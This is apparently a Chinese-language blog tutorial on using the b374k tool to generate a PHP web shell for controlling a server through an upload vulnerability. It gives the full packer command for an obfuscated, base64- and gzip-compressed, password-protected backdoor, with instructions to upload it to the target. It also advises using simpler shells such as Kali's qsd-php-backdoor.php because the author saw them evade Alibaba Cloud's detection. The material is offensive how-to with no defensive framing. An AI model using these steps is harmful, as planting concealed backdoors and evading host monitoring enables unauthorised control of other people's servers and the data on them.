Update avaliable. Click RELOAD to update.
目录

PHP后门生成工具b374k的使用方法

尽管现在互联网技术日新月异,但php类型的网站仍然占比较多(php建站工具丰富),与之而来的是php站点各种漏洞,本篇文章将会描述当你获取一个上传漏洞时,应该选择哪种php webshell进行控制,这里介绍b374k的php后门生成工具。

其实在kali2.0的”/usr/share/webshells/php“系统目录中也有几个可用的shell,另外你也可以使用weevely

2. 特性

由上面可知,b374k的确很强大,提供了丰富的功能、友好的界面操作方式。但优点越多的同时缺点暴露的就越多,b374k由于涉及很多系统函数,使用面广,所以很容易被站点所在的系统发现并查杀。所以往往越简单的shell越不容易被发现,例如开头所说的kali自带的几个webshell。

我曾经在阿里云服务器中测试过,当上传b374k的后门shell时,阿里云系统几秒钟就发现并进行的告警,当我使用kali2.0自带的qsd-php-backdoor.php时却没有任何告警信息,从这点可以看出越简单越好,其实仅仅提供一个简单的shell就可以做很多事情。

3. 使用

b374k作为生成shell后门的工具,提供了两种生成方式,一种给予界面的方式,一种是命令行的方式。给予界面的需要web服务器的支持,命令方式的需要php解释器的支持,下面是这两种方式的使用方法。

3.1 给予界面的

将克隆的b374k的目录放置到目标服务器中,通过域名访问界面生成地址,如://vinny.cc/b374k,配置好相应参数,点击run按钮即可进入webshell控制台,如下:

b374k界面生成

其实这种生成方式并不靠谱,需要把整个b374k的程序放到目标机器上,很容易被查杀和利用,并不推荐使用这种方式进行webshell的使用。

b374k web shell

3.2 给予命令行生成的

$ php -f index.php
b374k shell packer 0.4

options :
        -o filename                             保存的后门文件
        -p password                             访问的密码
        -t theme                                使用哪种主题
        -m modules                              使用的模块
        -s                                      去除注释和空白区域
        -b                                      是否用base64编码
        -z [no|gzdeflate|gzencode|gzcompress]   压缩方式
        -c [0-9]                                压缩级别
        -l                                      列出可用的模块
        -k                                      列出可用的主题

# -o 生成backdoor.php文件后门
# -p 后门的访问密码是123321
# -s 去除注释和空白区域
# -b 启用base64压缩
# -z 使用gzcompress的压缩方式
# -c 压缩级别为最高的9
php -f index.php -- -o backdoor.php -p 123321 -s -b -z gzcompress -c 9

生成好之后将backdoor.php上传至目标服务器中,使用密码123321进行访问即可看见b374k的界面操作。

版权所有,本作品采用知识共享署名-非商业性使用 3.0 未本地化版本许可协议进行许可。转载请注明出处:https://www.wangjun.dev//2016/05/php-b374k/